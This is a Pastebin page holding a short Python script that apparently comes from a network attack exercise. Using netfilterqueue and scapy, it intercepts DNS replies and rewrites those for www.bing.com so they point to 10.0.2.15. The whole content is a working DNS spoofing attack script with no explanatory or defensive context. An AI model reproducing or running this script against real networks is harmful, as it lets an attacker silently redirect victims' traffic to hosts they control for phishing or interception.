Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- def process_packet(packet):
- scapy_packet = scapy.IP(packet.get_payload())
- if scapy_packet.haslayer(scapy.DNSRR):
- scapy_packet[scapy.DNSQR].qname
- qname = scapy_packet[scapy.DNSQR].qname
- if "www.bing.com" in qname:
- print("[+] Spoofing target")
- answer = scapy.DNSRR(rrname=qname, rdata="10.0.2.15")
- scapy_packet[scapy.DNS].an = answer
- scapy_packet[scapy.DNS].ancount = 1
- del scapy_packet[scapy.IP].len
- del scapy_packet[scapy.IP].chksum
- del scapy_packet[scapy.UDP].chksum
- del scapy_packet[scapy.UDP].len
- packet.set_payload(str(scapy_packet))
- packet.accept()
- quene = netfilterqueue.NetfilterQueue()
- quene.bind(0, process_packet)
- quene.run()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement